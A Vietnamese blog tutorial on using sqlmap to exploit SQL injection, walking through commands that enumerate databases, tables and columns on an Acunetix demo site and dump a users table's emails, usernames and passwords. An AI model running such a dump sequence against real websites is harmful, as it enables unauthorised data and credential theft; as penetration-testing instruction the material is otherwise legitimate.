Sử Dụng SQLMAP để Khai Thác Lỗ Hỏng SQL Injection
Có thể bạn quan tâm
Sử dụng SQLMAP để khai thác lỗ hỏng SQL Injection Sử dụng SQLMAP để khai thác lỗ hỏng SQL Injection May 02, 2017
HomeKali Linux > Công cụ1. SQL Injection là gì?
Lỗ hổng SQL Injection là một lổ hỏng khá cơ bản và cũng khá nguy hiểm với các webmaster. Do sự thiếu cẩn trọng trong lúc lập trình hoặc không thể kiểm soát và fillter được hết các form để từ đó các script kiddies tận dụng inject vào thực thi query/command mà không cần login username/password để remote excute, dump data, lấy root sqlsever,..2. Các mục tiêu, điểm yếu của website.
Ta có thể tìm các trang web cho submit dữ liệu ở bất kì một trình tìm kiếm nào trên mạng chẳng hạn như form login, search, feedback,..3. Target và nội dung của bài viết này.
Đương nhiên đối với lỗi SQL Injection có rất nhiều kiểu khai thác, có thể tự query/command mà không cần sự hỗ trợ từ phần mềm thứ ba, cũng như sử dụng sqlroot, havij, sqlnija,.. Ở đây chúng ta sẽ sử dụng SQLMAP để thực hiện khai thác lỗ hỏng này.a) SQLMAP là gì?
SQLMAP là công cụ khai thác những lổ hỏng của cơ sở dữ liệu SQL. Công cụ này được xem là công cụ khai thác SQL tốt nhất hiện nay. Được giới bảo mật và giới hacker sử dụng thường xuyên. Với người dùng Kali hoặc Back Track 5 thì SQLMAP đã được tích hợp sẵn vào hệ điều hành. Riêng Windows thì chúng ta phải cài đặt thêm python và SQLMAP để sử dụng.b) Cách sử dụng, thực thi sqlmap.
Ở đây ta có một bài test của acunetix, đây là bài test phần mềm của họ nên không ảnh hưởng gì!TARGET : 176.28.50.165/listproducts.php?cat=1Để có thể khai thác được database của web này ta chạy cú pháp sau: sqlmap --url ' ' --dbs
sqlmap --url '176.28.50.165/listproducts.php?cat=1' --dbsỞ đây ta có kết quả như sau: Ta tiếp tục khai thác tables trong database acuart bằng cú pháp: sqlmap --url ' ' -D acuart --tables
sqlmap --url '176.28.50.165/listproducts.php?cat=1' -D acuart --tablesSau khi có tables ta tiếp tục kiểm tra columns ở đây ta chọn tables users: sqlmap --url ' ' -D acuart -T users --columns
sqlmap --url '176.28.50.165/listproducts.php?cat=1' -D acuart -T users --columnsCuối cùng ta dump data của columns users: sqlmap --url ' ' -D ' ' -T ' ' -C ' ' --dump
sqlmap --url '176.28.50.165/listproducts.php?cat=1' -D acuart -T users -C email,name,uname,pass--dump
KẾT:
Mình xin dừng bài viết tại đây, cảm ơn đã theo dõi,.. nếu có nhã ý hoặc thích bài viết này vui lòng share cho bạn bè cùng coi chung để ủng hộ tinh thần của member TKT. <33333333333333 Chyên Mục Kali Linux Kali Linux > Công cụ Bình chọnYou may like these posts
Post a Comment
0 Comments
Kết nối với tôi
Bài viết của tuần
Một trang blog về Laravel mới toanh đến từ tác giả TheKaliTools
October 06, 2021Bắt đầu tự học Kali Linux
August 01, 2021Bộ ebook PDF Đào tạo hacker mũ trắng - CEH v9 (Tiếng Việt)
April 06, 2017Chuyên mục
- Arch Linux 2
- Chuyện Phiếm 7
- IOT 1
- Kali Linux 90
- Linux 42
Cho người bắt đầu
Kali Linux > Cơ bảnBắt đầu tự học Kali Linux
August 01, 2021Chuyên Mục Con
- Arch Linux > Cơ bản
- Chuyện Phiếm > Thông báo
- IOT > Cơ bản
- Kali Linux > Android Pentest
- Kali Linux > Cơ bản
- Kali Linux > Công cụ
- Kali Linux > Series
- Kali Linux > Tài liệu
- Kali Linux > Thủ Thuật
- Kali Linux > Tin Tức
- Kali Linux > Ứng dụng
- Linux > Cơ bản
- Linux > Thảo luận
- Linux > Thủ Thuật
- Linux > Ứng dụng
Tài trợ
Hướng dẫn lập trình Laravel cho người mới Công ty Thiết Kế Website Tại Hồ Chí MinhBài Viết Mới
3/recent/post-listChuyên mục
- Arch Linux 2
- Chuyện Phiếm 7
- IOT 1
- Kali Linux 90
- Linux 42
Liên kết bạn bè
- • Lập trình Laravel từ A-Z
- • Blog Quản Trị Hệ Thống Mạng
- • Chia sẻ kiến thúc quản trị VPS
- • Tôi đi code dạo
- • Linux Team Viet Nam
- • TechZones - Kiến thức thực tế
- • QuangNinhBay.Com Niềm vui là chia sẻ
Menu Footer Widget
- Trang Chủ
- Giới Thiệu
- Liên Hệ
- Sơ Đồ Trang
Từ khóa » Cách Sử Dụng Sqlmap
-
Sử Dụng SQLMap để Khai Thác Lỗ Hổng SQL Injection (SQLi) - Viblo
-
Hướng Dẫn Sử Dụng SQLmap Cơ Bản Cho Newbie
-
Hướng Dẫn Sử Dụng SQLMAP để Khai Thác SQL Injection
-
Sử Dụng SQLMap để Khai Thác Lỗ Hổng SQL Injection (SQLi)
-
Khai Thác Lỗ Hổng SQL Injection Sử Dụng Sqlmap (Ở Mức độ Cơ Bản)
-
Sử Dụng Sqlmap Tấn Công SQL Injection Trong Kali Linux - W3seo
-
Hướng Dẫn Sử Dụng SQLMAP Trên Windows [SQL Injection]
-
Hướng Dẫn Sử Dụng SQLMap - AnonyViet
-
Sử Dụng SQLmap Cho Tấn Công SQL Injection - An Ninh Mạng
-
Hướng Dẫn Sử Dụng Sqlmap Cơ Bản Cho Newbie - In4tintuc
-
Sqlmap Là Gì - Hướng Dẫn Sử Dụng Sqlmap Cơ Bản Cho Newbie
-
Sqlmap Là Gì - Dùng Sqlmap Cho Tấn Công Sql Injection - Asiana
-
Sử Dụng Sqlmap Cho Tấn Công Sql Injection
-
Basic SQL Injection With Sqlmap - Sang Bui